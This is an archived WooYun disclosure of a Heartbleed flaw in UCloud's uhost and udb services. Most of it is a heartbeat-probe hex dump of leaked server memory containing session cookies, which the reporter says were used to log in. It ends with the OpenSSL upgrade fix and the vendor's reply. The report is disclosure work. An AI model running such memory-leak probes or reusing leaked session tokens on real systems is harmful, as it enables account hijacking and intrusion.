乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-09: 细节已通知厂商并且等待厂商处理中 2014-04-09: 厂商已经确认,细节仅向厂商公开 2014-04-19: 细节向核心白帽子及相关领域专家公开 2014-04-29: 细节向普通白帽子公开 2014-05-09: 细节向实习白帽子公开 2014-05-24: 细节向公众公开
UCloud运维不当导致可以登录随机用户并且获取服务器敏感信息
https://uhost.ucloud.cnhttps://udb.ucloud.cn获得敏感信息
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 3187 ... received message: type = 22, ver = 0302, length = 525 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 02 01 04 03 ....#........... 00e0: 05 03 02 03 04 02 02 02 00 12 00 00 03 04 02 02 ................ 00f0: 02 35 EC 72 16 9E 9C 09 36 BE 3F 30 0B 7E 66 45 .5.r....6.?0.~fE 0100: 0B 1F A5 08 8F AE 95 D0 0A CF 4E 8B B5 D6 7A 56 ..........N...zV 0110: 0E 8C 3E 35 CC 0C 13 78 39 D5 E4 8A 43 9A E5 DF ..>5...x9...C... 0120: 9C 62 C5 CA 60 CF 07 51 DD C1 1A 3D 45 86 23 FE .b..`..Q...=E.#. 0130: 7C A9 56 D2 60 AE 69 23 8E A0 BB FA 8F 96 C9 C7 |.V.`.i#........ 0140: 02 91 30 E5 F4 94 EF 3A 61 2A 1B 0D 46 48 2D 66 ..0....:a*..FH-f 0150: 64 E6 12 5A 1E 3A A4 A2 46 D5 B9 5F 21 46 EC FB d..Z.:..F.._!F.. 0160: F6 08 DD 08 05 45 AB 32 56 3D 87 01 C6 A6 73 01 .....E.2V=....s. 0170: AE 3E A6 D1 6E 04 09 2C 00 05 00 05 01 00 00 00 .>..n..,........ 0180: 00 47 42 4B 2C 75 74 66 2D 38 3B 71 3D 30 2E 37 .GBK,utf-8;q=0.7 0190: 2C 2A 3B 71 3D 30 2E 33 0D 0A 43 6F 6F 6B 69 65 ,*;q=0.3..Cookie 01a0: 3A 20 72 65 66 65 72 72 65 72 5F 75 72 6C 3D 68 : referrer_url=h 01b0: 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2E ttp%3A%2F%2Fwww. 01c0: 67 6F 6F 67 6C 65 2E 63 6F 6D 2E 68 6B 25 32 46 google.com.hk%2F 01d0: 75 72 6C 25 33 46 73 61 25 33 44 74 25 32 36 72 url%3Fsa%3Dt%26r 01e0: 63 74 25 33 44 6A 25 32 36 71 25 33 44 55 43 6C ct%3Dj%26q%3DUCl 01f0: 6F 75 64 25 32 36 73 6F 75 72 63 65 25 33 44 77 oud%26source%3Dw 0200: 65 62 25 32 36 63 64 25 33 44 31 25 32 36 76 65 eb%26cd%3D1%26ve 0210: 64 25 33 44 30 43 44 67 51 46 6A 41 41 25 32 36 d%3D0CDgQFjAA%26 0220: 75 72 6C 25 33 44 25 32 35 36 38 25 32 35 37 34 url%3D%2568%2574 0230: 25 32 35 37 34 25 32 35 37 30 25 32 35 37 33 25 %2574%2570%2573% 0240: 32 35 33 61 25 32 35 32 66 25 32 35 32 66 25 32 253a%252f%252f%2 0250: 35 37 37 25 32 35 37 37 25 32 35 37 37 25 32 35 577%2577%2577%25 0260: 32 65 25 32 35 37 35 25 32 35 36 33 25 32 35 36 2e%2575%2563%256 0270: 63 25 32 35 36 66 25 32 35 37 35 25 32 35 36 34 c%256f%2575%2564 0280: 25 32 35 32 65 25 32 35 36 33 25 32 35 36 65 25 %252e%2563%256e% 0290: 32 35 32 66 25 32 36 65 69 25 33 44 56 7A 6B 36 252f%26ei%3DVzk6 02a0: 55 38 47 48 45 75 65 59 69 41 65 51 6A 6F 44 51 U8GHEueYiAeQjoDQ 02b0: 41 51 25 32 36 75 73 67 25 33 44 41 46 51 6A 43 AQ%26usg%3DAFQjC 02c0: 4E 45 49 41 56 4F 46 4B 48 71 4B 6D 65 78 45 36 NEIAVOFKHqKmexE6 02d0: 73 46 44 56 70 53 42 50 52 74 61 46 51 25 32 36 sFDVpSBPRtaFQ%26 02e0: 62 76 6D 25 33 44 62 76 2E 36 33 39 33 34 36 33 bvm%3Dbv.6393463 02f0: 34 25 32 43 64 2E 61 47 63 25 32 36 63 61 64 25 4%2Cd.aGc%26cad% 0300: 33 44 72 6A 74 3B 20 74 67 74 3D 54 47 43 2D 31 3Drjt; tgt=TGC-1 0310: 33 39 36 33 32 34 37 32 35 72 35 42 32 36 38 46 396324725r5B268F 0320: 33 46 42 32 37 45 30 46 39 34 45 34 3B 20 50 48 3FB27E0F94E4; PH 0330: 50 53 45 53 53 49 44 3D 53 54 2D 31 33 39 36 33 PSESSID=ST-13963 0340: 33 38 33 32 33 72 31 30 46 30 31 35 31 31 34 33 38323r10F0151143 0350: 31 30 39 32 41 30 32 41 3B 20 5F 5F 75 74 6D 61 1092A02A; __utma 0360: 3D 31 31 31 33 38 39 33 33 32 2E 31 31 35 35 32 =111389332.11552 0370: 33 38 38 36 30 2E 31 33 39 36 33 33 34 31 37 38 38860.1396334178 0380: 2E 31 33 39 36 33 33 34 31 37 38 2E 31 33 39 36 .1396334178.1396 0390: 33 33 38 33 32 36 2E 32 3B 20 5F 5F 75 74 6D 63 338326.2; __utmc 03a0: 3D 31 31 31 33 38 39 33 33 32 3B 20 5F 5F 75 74 =111389332; __ut 03b0: 6D 7A 3D 31 31 31 33 38 39 33 33 32 2E 31 33 39 mz=111389332.139 03c0: 36 33 33 38 33 32 36 2E 32 2E 32 2E 75 74 6D 63 6338326.2.2.utmc 03d0: 73 72 3D 75 64 62 2E 75 63 6C 6F 75 64 2E 63 6E sr=udb.ucloud.cn 03e0: 7C 75 74 6D 63 63 6E 3D 28 72 65 66 65 72 72 61 |utmccn=(referra 03f0: 6C 29 7C 75 74 6D 63 6D 64 3D 72 65 66 65 72 72 l)|utmcmd=referr 0400: 61 6C 7C 75 74 6D 63 63 74 3D 2F 75 64 62 2F 63 al|utmcct=/udb/c 0410: 72 65 61 74 65 3B 20 48 6D 5F 6C 76 74 5F 36 31 reate; Hm_lvt_61 0420: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33 7e36e9c35ee2ab63 0430: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31 cf90b4fd2a3d3d=1 0440: 33 39 36 30 38 37 36 34 36 2C 31 33 39 36 33 32 396087646,139632 0450: 34 37 30 36 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 4706; Hm_lpvt_61 0460: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33 7e36e9c35ee2ab63 0470: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31 cf90b4fd2a3d3d=1 0480: 33 39 36 33 33 39 32 35 35 0D 0A 0D 0A 5E 8B B7 396339255....^.. 0490: 90 FA 5A 1A 12 16 BE 41 D1 6B 55 2F 8E B6 5E 45 ..Z....A.kU/..^E 04a0: EE 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ................ 04b0: E6 06 0F 6F 2E 3C 87 CC 64 4D 64 DE F8 07 8A 0C ...o.<..dMd..... 04c0: A4 A6 68 A3 B9 6A 84 4E A9 F4 AD 69 20 86 44 58 ..h..j.N...i .DX 04d0: 46 D9 57 E1 E3 1B 1E 70 0B F6 EE 32 F2 C4 5E D1 F.W....p...2..^. 04e0: 6A 7C 2B 5A 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B j|+Z............ 04f0: 94 56 04 9F A6 9A 4B 45 8E E9 2B 75 74 74 90 D6 .V....KE..+utt.. 0500: 31 CD C8 BC 84 60 BD 1D 96 69 11 9E 67 88 F0 F9 1....`...i..g... 0510: 55 8E FC 23 CF 36 49 3E 26 AD E4 FE A5 35 E4 42 U..#.6I>&....5.B 0520: A1 49 D7 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C .I.............. 0530: 17 03 01 00 20 75 6D 48 7F AD 01 FF CC FE 26 22 .... umH......&" 0540: 03 15 84 0A 45 4E 86 FA 66 B3 0A 0A 0A 0A 0A 0A ....EN..f....... 0550: 0A 0A 0A 0A 0A 17 03 01 00 90 8B C7 80 27 82 B4 .............'.. 0560: E9 AC 0D 66 40 11 53 1B 09 62 09 0E 8E 0C 0F C0 [email protected]...... 0570: 3F BE 2A 64 13 88 24 36 90 0C 7E CB 16 1C 41 FF ?.*d..$6..~...A. 0580: 72 9B BB 20 F4 B1 18 03 E7 1A 09 7A F3 FF 95 8E r.. .......z.... 0590: 73 17 B7 9D C8 34 E9 A1 CD F2 EF 2F 5C BE E0 3C s....4...../\..< 05a0: 51 54 48 84 10 62 E3 7D 34 5F 00 E7 26 1A 2C CB QTH..b.}4_..&.,. 05b0: F8 74 B8 D6 A0 8F 68 7A A4 ED C4 D5 F5 4C 42 3D .t....hz.....LB= 05c0: 0B DE D0 F4 43 8F 5F 4D 93 05 10 50 8C 50 A9 72 ....C._M...P.P.r 05d0: E2 67 59 BC 06 F0 6A CC 7F C0 AC 45 89 44 07 7F .gY...j....E.D.. 05e0: 83 F9 99 70 9A C4 B1 55 3D 95 8F 5F 4D 93 05 10 ...p...U=.._M... 05f0: 50 8C 50 A9 72 E2 67 59 BC 06 F0 6A CC 7F C0 AC P.P.r.gY...j.... 0600: 45 89 44 07 7F 83 F9 99 70 9A C4 B1 55 3D 95 65 E.D.....p...U=.e 0610: 39 63 33 35 65 65 32 61 62 36 33 63 66 39 30 62 9c35ee2ab63cf90b 0620: 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 39 34 4fd2a3d3d=139694 0630: 34 35 30 36 0D 0A 49 66 2D 4D 6F 64 69 66 69 65 4506..If-Modifie 0640: 64 2D 53 69 6E 63 65 3A 20 54 68 75 2C 20 31 39 d-Since: Thu, 19 0650: 20 44 65 63 20 32 30 31 33 20 30 34 3A 35 39 3A Dec 2013 04:59: 0660: 31 35 20 47 4D 54 0D 0A 0D 0A CC 16 AB 46 AE D2 15 GMT.......F.. 0670: DE C6 52 94 19 C5 50 23 93 E4 01 FF E9 1C C5 BE ..R...P#........ 0680: 64 23 EB A9 1F 37 D1 0A 68 F9 12 24 74 68 69 6E d#...7..h..$thin 0690: 6B 70 68 70 2E 63 6E 25 32 36 64 74 64 25 33 44 kphp.cn%26dtd%3D 06a0: 31 38 3B 20 48 6D 5F 6C 76 74 5F 36 31 37 65 33 18; Hm_lvt_617e3 06b0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39 6e9c35ee2ab63cf9 06c0: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 0b4fd2a3d3d=1396 06d0: 39 34 32 30 34 34 2C 31 33 39 36 39 34 32 39 30 942044,139694290 06e0: 34 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 37 65 33 4; Hm_lpvt_617e3 06f0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39 6e9c35ee2ab63cf9 0700: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 0b4fd2a3d3d=1396 0710: 39 34 32 39 31 31 0D 0A 49 66 2D 4D 6F 64 69 66 942911..If-Modif 0720: 69 65 64 2D 53 69 6E 63 65 3A 20 54 75 65 2C 20 ied-Since: Tue, 0730: 32 34 20 44 65 63 20 32 30 31 33 20 30 37 3A 34 24 Dec 2013 07:4 0740: 34 3A 31 38 20 47 4D 54 0D 0A 0D 0A E4 30 B1 B7 4:18 GMT.....0.. 0750: 3D F8 B0 BE 6C B6 61 41 E7 03 DE AF 34 30 6C 64 =...l.aA....40ld 0760: 33 30 6C 76 32 33 2D 2D 73 74 31 35 73 61 31 32 30lv23--st15sa12 0770: 6C 74 32 30 6C 64 31 36 6C 76 31 36 2D 73 74 31 lt20ld16lv16-st1 0780: 32 73 61 31 30 2D 73 74 31 32 73 61 31 30 25 32 2sa10-st12sa10%2 0790: 36 72 75 72 6C 25 33 44 68 74 74 70 25 32 35 33 6rurl%3Dhttp%253 07a0: 41 25 32 35 32 46 25 32 35 32 46 77 77 33 38 2E A%252F%252Fww38. 07b0: 6C 69 6E 75 78 66 61 62 2E 63 78 25 32 35 32 46 linuxfab.cx%252F 07c0: 25 32 36 72 65 66 25 33 44 68 74 74 70 25 32 35 %26ref%3Dhttp%25 07d0: 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2E 3A%252F%252Fwww. 07e0: 73 74 75 64 79 2D 61 72 65 61 2E 6F 72 67 25 32 study-area.org%2 07f0: 35 32 46 6C 69 6E 6B 2E 68 74 6D 0D 0A 0D 0A 5D 52Flink.htm....] 0800: 11 C6 69 CF 01 65 1F B3 5D 31 CA 9E 61 9C D3 2E ..i..e..]1..a... 0810: 75 74 6D 63 73 72 3D 28 64 69 72 65 63 74 29 7C utmcsr=(direct)| 0820: 75 74 6D 63 63 6E 3D 28 64 69 72 65 63 74 29 7C utmccn=(direct)| 0830: 75 74 6D 63 6D 64 3D 28 6E 6F 6E 65 29 0D 0A 0D utmcmd=(none)... 0840: 0A 0C E2 A8 8B 73 71 FE 0D 53 41 81 DC BE 61 3D .....sq..SA...a= 0850: FA 46 43 32 32 35 39 0D 0A 0D 0A FD 2C 93 BB C8 .FC2259.....,... 0860: 4A 58 D6 25 CC 83 48 67 FE 37 C9 FE 2E D6 0C B2 JX.%..Hg.7...... 0870: DE 4D 85 23 37 04 6B 5A 0C 0C 0C 0C 0C 0C 0C 0C .M.#7.kZ........ 0880: 0C 0C 0C 0C 0C DD 2B BC 8B CE FE FE 6D EE 75 A7 ......+.....m.u. 0890: 2B 92 E8 7A 94 B8 63 AF 87 B4 74 3D 2F 0D 0A 0D +..z..c...t=/... 08a0: 0A 95 A9 40 DA B2 55 E0 62 72 AF AA AC AB 66 06 [email protected]. 08b0: 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f............... 08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
成功利用cookie登录,可进行下一步攻击
升级openssl
危害等级:高
漏洞Rank:20
确认时间:2014-04-09 15:25
感谢您对UCLOUD 的支持, 还想要提一下, 更新openssl 时有些依赖程序,如果是动态链接,需要重启服务, 静态连接则需要重新编译服务了,例如: Nginx
暂无
